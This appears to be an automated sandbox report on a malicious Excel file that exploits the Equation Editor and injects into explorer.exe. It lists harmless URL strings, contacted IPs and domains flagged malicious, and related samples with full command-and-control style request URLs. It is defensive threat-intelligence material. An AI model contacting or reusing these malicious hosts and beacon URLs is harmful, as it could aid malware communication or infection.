                                              http://www.dailymail.co.uk/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www3.fnac.com/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                high
                                                http://buscar.ya.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  high
                                                  http://search.yahoo.com/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    high
                                                    http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.2204196235.0000000004B50000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://weather.gc.ca/astro/seeing_e.html)vbc.exe, 00000004.00000002.2182475008.0000000001202000.00000020.00020000.sdmp, vbc.exe, 00000005.00000002.2230139521.0000000001202000.00000020.00020000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.sogou.com/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      high
                                                      http://asp.usatoday.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        high
                                                        http://fr.search.yahoo.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          high
                                                          http://rover.ebay.comexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            high
                                                            http://in.search.yahoo.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              high
                                                              http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                high
                                                                http://search.ebay.in/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  high
                                                                  http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://%s.comexplorer.exe, 00000006.00000000.2219748309.000000000A330000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  low
                                                                  http://msk.afisha.ru/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2182872595.0000000002726000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://search.rediff.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        high
                                                                        http://www.windows.com/pctv.explorer.exe, 00000006.00000000.2202179783.0000000003C40000.00000002.00000001.sdmpfalse
                                                                          high
                                                                          http://www.ya.com/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://it.search.dada.net/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://search.naver.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://www.google.ru/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://search.hanafos.com/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.abril.com.br/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://search.daum.net/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://search.naver.com/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://www.clarin.com/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://buscar.ozu.es/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://kr.search.yahoo.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://search.about.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          high
                                                                                          http://busca.igbusca.com.br/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://www.ask.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://www.priceminister.com/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://www.cjmall.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://search.centrum.cz/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://suche.t-online.de/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://www.google.it/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://search.auction.co.kr/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://www.ceneo.pl/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://www.amazon.de/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000002.2393313509.0000000000260000.00000004.00000020.sdmpfalse
                                                                                                              high
                                                                                                              http://sads.myspace.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://google.pchome.com.tw/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.rambler.ru/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://uk.search.yahoo.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://espanol.search.yahoo.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.ozu.es/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://search.sify.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://openimage.interpark.com/interpark.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://search.ebay.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.gmarket.co.kr/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://search.nifty.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://searchresults.news.com.au/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.google.si/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.google.cz/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://www.soso.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.univision.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://search.ebay.it/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            http://busca.orange.es/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2219748309.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://www.target.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://buscador.terra.es/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://www.iask.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://www.tesco.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://search.interpark.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://investor.msn.com/explorer.exe, 00000006.00000000.2202179783.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://search.espn.go.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://www.myspace.com/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://search.centrum.cz/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://p.zhongsou.com/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://service2.bfast.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://www.%s.comPAexplorer.exe, 00000006.00000002.2393631974.0000000001C70000.00000002.00000001.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    low
                                                                                                                                                                    http://ariadna.elmundo.es/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                      high

                                                                                                                                                                      Contacted IPs

                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                      Public

                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                      52.58.78.16
                                                                                                                                                                      www.aideliveryrobot.comUnited States
                                                                                                                                                                      16509AMAZON-02UStrue
                                                                                                                                                                      23.82.57.32
                                                                                                                                                                      www.ruhexuangou.comUnited States
                                                                                                                                                                      7203LEASEWEB-USA-SFO-12UStrue
                                                                                                                                                                      3.125.17.227
                                                                                                                                                                      unknownUnited States
                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                      198.54.126.105
                                                                                                                                                                      vectoroutlines.comUnited States
                                                                                                                                                                      22612NAMECHEAP-NETUStrue
                                                                                                                                                                      18.236.1.157
                                                                                                                                                                      sites-external-prod-ebc852aa8146fe7f.elb.us-west-2.amazonaws.comUnited States
                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                      192.169.223.13
                                                                                                                                                                      centergolosinas.comUnited States
                                                                                                                                                                      26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                                                                                      160.153.137.40
                                                                                                                                                                      shopihy.comUnited States
                                                                                                                                                                      21501GODADDY-AMSDEtrue

                                                                                                                                                                      Private

                                                                                                                                                                      IP
                                                                                                                                                                      192.168.2.22
                                                                                                                                                                      192.168.2.255

                                                                                                                                                                      General Information

                                                                                                                                                                      Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                                      Analysis ID:385456
                                                                                                                                                                      Start date:12.04.2021
                                                                                                                                                                      Start time:14:43:47
                                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                                      Overall analysis duration:0h 11m 8s
                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                      Report type:light
                                                                                                                                                                      Sample file name:Processed APR12.xlsx
                                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                      Number of analysed new started processes analysed:9
                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                      Number of injected processes analysed:1
                                                                                                                                                                      Technologies:
                                                                                                                                                                      • HCA enabled
                                                                                                                                                                      • EGA enabled
                                                                                                                                                                      • HDC enabled
                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                      Detection:MAL
                                                                                                                                                                      Classification:mal100.troj.expl.evad.winXLSX@9/11@9/9
                                                                                                                                                                      EGA Information:Failed
                                                                                                                                                                      HDC Information:
                                                                                                                                                                      • Successful, ratio: 37.6% (good quality ratio 35.2%)
                                                                                                                                                                      • Quality average: 72.8%
                                                                                                                                                                      • Quality standard deviation: 30.3%
                                                                                                                                                                      HCA Information:
                                                                                                                                                                      • Successful, ratio: 92%
                                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                      • Adjust boot time
                                                                                                                                                                      • Enable AMSI
                                                                                                                                                                      • Found application associated with file extension: .xlsx
                                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                                      • Scroll down
                                                                                                                                                                      • Close Viewer
                                                                                                                                                                      Warnings:
                                                                                                                                                                      Show All
                                                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                                                                                                                      • TCP Packets have been reduced to 100
                                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/385456/sample/Processed APR12.xlsx

                                                                                                                                                                      Simulations

                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                      14:45:19API Interceptor44x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                                      14:45:21API Interceptor65x Sleep call for process: vbc.exe modified
                                                                                                                                                                      14:45:48API Interceptor215x Sleep call for process: help.exe modified
                                                                                                                                                                      14:46:18API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                      IPs

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                      52.58.78.16sgJRcWvnkP.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.stableuk.com/svh9/?EZA4iv=SAov/B5FsNXs8CYS4T1NMT+ZAvY12qvZakH1c7zD86HMadb8HLL1ETDt9u0xpnMR3nHx+hyT6w==&GzuLH=VBZtT83HH6GhB4
                                                                                                                                                                      Pd0Tb0v0WW.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.ux300e.com/iu4d/?jBZ4=JvjSk9WUlBdgONG69H9sib5J4SPt/vPlwOmf1A06UqzVvRJVghpTE97et7kDme6aF6nY&1bz=WXrpCdsXv
                                                                                                                                                                      PO_NO.04-PRFTMUM210040.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.xagotis.com/y04g/?lJB4Zh0=3Jn3uBx7/ZBljyzv4Umoq+2hDKbl1TRmFQ95OX1mUwYfWQx7gkyDmleE9vHIq0igfKn2IiTZog==&Bt=LzrdM2n8i2T4
                                                                                                                                                                      Calt7BoW2a.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.physicalrobot.com/evpn/?kzrxPDG=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB+xjvwGDX3fv&Dxoxa=ZRmh28X82b
                                                                                                                                                                      TazxfJHRhq.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.physicalrobot.com/evpn/?JDK8ix=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB9RzgRW7JS2o&w4=jFNp36Ihu
                                                                                                                                                                      hvEop8Y70Y.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.ux300e.com/iu4d/?AR6=JvjSk9WUlBdgONG69H9sib5J4SPt/vPlwOmf1A06UqzVvRJVghpTE97et7kDme6aF6nY&nflLiT=xPJxAxbPf
                                                                                                                                                                      payment.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.zhongziciliso.com/bei3/?Rl=M48tiJch&M4YDYvh=k7z9a6KJXiC72cK7/jyRasNe+Sy9PqpwlSKQgjyd8bQZ1xLLuKiQUgQj6rSCbw2ZrbBi
                                                                                                                                                                      Order.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.knfsupplies.com/cugi/?BlL=qOwU1OTG7mkRPnuzfMsyuhPzA0VHPvUCBiAoo9Zce23EVhCwG2VyIrVTMhZllQbTDf+j&EZXpx6=tXExBh8PdJwpH
                                                                                                                                                                      BL84995005038483.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.bestsocialprograms.com/mb7q/?Kzr4=aRV3v7STN1gbvnN6un228S10svC1Sutq8rbGJILV4mttNz8FuFvB2m5MPz63ES8dTJFmRm2LIQ==&OtZlC2=JPhH0LRX981dlx
                                                                                                                                                                      PO91361.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.yuemion.com/sb9r/?j2JhErl=rJxolaRUr1mWG0o1dUZb+NmVdUrYk2L88LMId3La8wrAf3SFZTorjLllmLv1JSZYoSAD&NXf8l=AvBHWhTxsnkxJjj0
                                                                                                                                                                      RFQ-V-SAM-0321D056-DOC.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.suosht.com/uwec/?v2=tsMTrLYcrap2GukmDd5H+gA9PR5vxlRtmXcAAVzRggD35KIYdxkEWToTwr5T4ko2rax0&CZ6=7nExZbW
                                                                                                                                                                      Shinshin Machinery.exe.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.annabelsasia.com/g7b/?Bzu=IjtUh+ajvqDBCqeZNN5uvvLYJJH0gAt6k2v6kHQzMhdo+O3jDfMFt+ZnLjs+WScGQBhC&Rxo=M6hD4jnx_05t
                                                                                                                                                                      yQh96Jd6TZ.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.nicemoneymaker.com/vu9b/?OV0xlV=b7gOWZrG8twfyhpAFuxkPT+vPN2LggkC47Unn4g6AMPZt2SHOO4aYUooq1pwGFLGZrTg&wh=jL0xYFb0mbwHi
                                                                                                                                                                      Invoice No. 21SWZ020.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.physicalrobot.com/evpn/?Y2MtLLPX=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB+xjvwGDX3fv&Ezu=UVFpYz0hIPjtGvD
                                                                                                                                                                      P.O_RFQ0098765434.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • www.nicemoneymaker.com/vu9b/?sHt=b7gOWZrD8qwbyxlMHuxkPT+vPN2LggkC47M37787EsPYtH+BJepWOQQqpQFMdl/1WqGQQA==&Ab=gXuD_lh8bBV4p0A
                                                                                                                                                                      MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.vehcimbev.com/rrrq/?uDKlwt=XPiPwvlxrzD&0R-LTpD=ZoyK93BFZg5bhToKNkvS+4H3u7vdriErK6KdZz21IbWYfqVPSHFlcVcSgcySxB5KZp6z
                                                                                                                                                                      SOA.scr.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.quickshop.xyz/edbs/?1bJ=Fxo0jXLhpT&jpTd3Lg=Xf0AsKcEcxS6VBzv6eMId9BOKf3y7pEXXtGVhjSx+HGa1oGNkidRGQ2YsckjNlg0L7MJ
                                                                                                                                                                      Item pending delivery - Final attempt to reach you.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.justcleanandgo.com/jpx/?iDHhJJrP=mcSXJ9rzsahvcQNLt2XcaIdq2nh7WmHXrWVcKt4m89SwRwN6h9IEoO42kLqyr3q6izAk&SZ=NZKxbfDht0
                                                                                                                                                                      New Order.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • www.physicalrobot.com/evpn/?RB=mJ1WicGlY2GmPPBqg48PwwH9NxkuMiIXMjd/3ZNeMhMeYAPtqYgseV4kCY9lkBSICRrYBg==&qDH4D=f8c0xBrPYP1xE
                                                                                                                                                                      TT Remittance Copy.PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.nastablecoin.com/ihmh/?wP9=9xrH76mdfDx9iKgvbvU3vEebTN88KEv9G+0YP+1kUawk0yQyRcbX9OOF804+QBd5YfcY&lZQ=7nbLunBhP
                                                                                                                                                                      23.82.57.3236ne6xnkop.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.ruhexuangou.com/p2io/?1bVpY=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLBueD84dbw&TVg8Ar=tFNd1Vlhj2qp
                                                                                                                                                                      Customer-100912288113.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • www.ruhexuangou.com/p2io/?YPxxw=JxlLiTVHLV_&4h=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==
                                                                                                                                                                      Gt8AN6GiOD.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.ruhexuangou.com/p2io/?JtxH=XPs0s4JPf&n8Ehjz3=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLrxuz88fTw
